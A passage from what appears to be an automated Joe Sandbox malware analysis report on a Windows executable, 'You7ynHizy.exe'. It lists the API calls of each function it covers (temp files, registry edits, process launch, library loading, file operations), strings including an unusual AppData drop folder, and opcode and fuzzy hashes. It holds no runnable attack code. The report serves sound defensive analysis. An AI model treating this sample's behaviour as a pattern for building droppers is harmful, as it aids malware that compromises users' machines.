                                                                                            • GetLastError.KERNEL32 ref: 00405844
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                            • String ID: C:\Users\user\Desktop
                                                                                            • API String ID: 3449924974-3125694417
                                                                                            • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                            • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                                            • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                            • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9

                                                                                            Control-flow Graph

                                                                                            [Control-flow graph beginning at 405dbc; graph image not reproduced]
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00405DDA
                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\You7ynHizy.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6), ref: 00405DF5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountFileNameTempTick
                                                                                            • String ID: "C:\Users\user\Desktop\You7ynHizy.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                            • API String ID: 1716503409-1909765820
                                                                                            • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                            • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                                            • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                            • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4

                                                                                            Control-flow Graph

                                                                                            [Control-flow graph beginning at 402d44; graph image not reproduced]
                                                                                            APIs
                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$Enum
                                                                                            • String ID:
                                                                                            • API String ID: 464197530-0
                                                                                            • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                            • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
                                                                                            • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                            • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
                                                                                            APIs
                                                                                              • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405C25
                                                                                              • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                                              • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                              • Part of subcall function 004057CE: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,?,00000000,000000F0), ref: 0040164D
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 00401640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                            • String ID: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                                                                            • API String ID: 1892508949-1034134010
                                                                                            • Opcode ID: 9e5626dcab178d18660621b241e7a2734acb43fa84c417fb4ea69048e5d5e0e9
                                                                                            • Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
                                                                                            • Opcode Fuzzy Hash: 9e5626dcab178d18660621b241e7a2734acb43fa84c417fb4ea69048e5d5e0e9
                                                                                            • Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E
                                                                                            APIs
                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,004063D9,80000002), ref: 004061AB
                                                                                            • RegCloseKey.KERNELBASE(?,?,004063D9,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,halituses), ref: 004061B6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseQueryValue
                                                                                            • String ID: : Completed
                                                                                            • API String ID: 3356406503-2954849223
                                                                                            • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                            • Instruction ID: f8c60df0673843c4a96ed35a73ceba2ba355a7ad566f59c539dda5576aee505e
                                                                                            • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                            • Instruction Fuzzy Hash: B301BC72500219EADF21CF50CC09EDB3BA8EB04360F01803AFD16A6191E778D964CBA4
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                                                                            • CloseHandle.KERNEL32(?), ref: 004058B6
                                                                                            Strings
                                                                                            • Error launching installer, xrefs: 00405893
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcess
                                                                                            • String ID: Error launching installer
                                                                                            • API String ID: 3712363035-66219284
                                                                                            • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                            • Instruction ID: b039bfc1fd8153a77b97507ee8e8b42fe9752dbefc529c56e43fdfa491991b30
                                                                                            • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                                                                            • Instruction Fuzzy Hash: 6CE0B6F5600209BFFB00AF64ED09E7B7BACEB58605F058525BD51F2290D6B998148A78
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040205D
                                                                                              • Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                              • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                              • Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,762323A0), ref: 0040535A
                                                                                              • Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 334405425-0
                                                                                            • Opcode ID: 7a25ddf71574e17a44a7b6d6d2d8623a607b9bc29b791e8d98a732f6a3ef313a
                                                                                            • Instruction ID: 589db8f59639f89aa10495d7cc04380c60c8a7cdceb46225d1e949d191b74c22
                                                                                            • Opcode Fuzzy Hash: 7a25ddf71574e17a44a7b6d6d2d8623a607b9bc29b791e8d98a732f6a3ef313a
                                                                                            • Instruction Fuzzy Hash: 51218071D00205AACF20AFA5CE4999E7A70BF04358F74813BF511B51E0DBBD8991DB6A
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(0040B5A8,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseValuelstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2655323295-0
                                                                                            • Opcode ID: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
                                                                                            • Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
                                                                                            • Opcode Fuzzy Hash: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
                                                                                            • Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28
                                                                                            APIs
                                                                                              • Part of subcall function 004065DA: FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420), ref: 004065E5
                                                                                              • Part of subcall function 004065DA: FindClose.KERNEL32(00000000), ref: 004065F1
                                                                                            • lstrlenW.KERNEL32 ref: 00402299
                                                                                            • lstrlenW.KERNEL32(00000000), ref: 004022A4
                                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                            • String ID:
                                                                                            • API String ID: 1486964399-0
                                                                                            • Opcode ID: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
                                                                                            • Instruction ID: bbe877ab11025427faf5f2d41b675fbfdb26c0ea37d129f2242468f609b66021
                                                                                            • Opcode Fuzzy Hash: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
                                                                                            • Instruction Fuzzy Hash: 74117071D10314AADF10EFF98A4999EB7B8AF04344F14847FA805F72D1D6B8C4418B59
                                                                                            APIs
                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Enum$CloseValue
                                                                                            • String ID:
                                                                                            • API String ID: 397863658-0
                                                                                            • Opcode ID: 95b9409de080be2480ae3ebee57d62febf19c414c59d57b92fdc5ca9ae51cd4c
                                                                                            • Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
                                                                                            • Opcode Fuzzy Hash: 95b9409de080be2480ae3ebee57d62febf19c414c59d57b92fdc5ca9ae51cd4c
                                                                                            • Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69
                                                                                            APIs
                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CloseQueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3356406503-0
                                                                                            • Opcode ID: ef205e07a954bd81c45d0a02b1537dcbd35f0958168012aad3e58056c5502209
                                                                                            • Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
                                                                                            • Opcode Fuzzy Hash: ef205e07a954bd81c45d0a02b1537dcbd35f0958168012aad3e58056c5502209
                                                                                            • Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A
                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                            • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                                                                            • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                            • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                                                                            APIs
                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004023B0
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteValue
                                                                                            • String ID:
                                                                                            • API String ID: 2831762973-0
                                                                                            • Opcode ID: abe2d5b86983b76f37ebbeb52e479933b9f051492a06271b13e7fa2919bd31b5
                                                                                            • Instruction ID: ea1e1dc52e0dd693c7e9773bcfdc4231a80a88f887ae940f22e44fa758f22ebe
                                                                                            • Opcode Fuzzy Hash: abe2d5b86983b76f37ebbeb52e479933b9f051492a06271b13e7fa2919bd31b5
                                                                                            • Instruction Fuzzy Hash: 4CF06232A045119BE704ABA49B8EABE72A4AB44354F29403FFA42F71C1CAF85D41576D
                                                                                            APIs
                                                                                            • OleInitialize.OLE32(00000000), ref: 004053E2
                                                                                              • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 0040542E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 2896919175-0
                                                                                            • Opcode ID: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
                                                                                            • Instruction ID: 958387d264b6e353c5d11acff8941ae2ccbfc231999d5e23939142942d374e26
                                                                                            • Opcode Fuzzy Hash: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
                                                                                            • Instruction Fuzzy Hash: A8F024735009108BD3402B40ED02B6773A4EBC5301F05C03FEE84B22E1CB780C408B1E
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1268545403-0
                                                                                            • Opcode ID: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
                                                                                            • Instruction ID: ff893fd080683d27dd3b5e94bf1da30195128cfff23c54bbc30ea882265df843
                                                                                            • Opcode Fuzzy Hash: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
                                                                                            • Instruction Fuzzy Hash: DBE04876B141049BCB14CBA8DD8086E77A5A789310724457BD501B3650CA79AD50CF68
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                              • Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                              • Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
                                                                                              • Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2547128583-0
                                                                                            • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                            • Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
                                                                                            • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                            • Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\You7ynHizy.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate
                                                                                            • String ID:
                                                                                            • API String ID: 415043291-0
                                                                                            • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                            • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                            • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                            • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                            • Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
                                                                                            • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                            • Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
                                                                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                            • Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
                                                                                            • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                            • Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D
                                                                                            APIs
                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringWrite
                                                                                            • String ID:
                                                                                            • API String ID: 390214022-0
                                                                                            • Opcode ID: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
                                                                                            • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                                            • Opcode Fuzzy Hash: 5fb29c7ac6bd4be6067060594f6abdd8dc98f2d64ebda3ebf196088e56367313
                                                                                            • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                                            APIs
                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                            • Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
                                                                                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                            • Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                            • Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
                                                                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                            • Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4
                                                                                            APIs
                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                            • Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
                                                                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                            • Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406192,?,00000000,?,?,: Completed,?), ref: 00406128
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
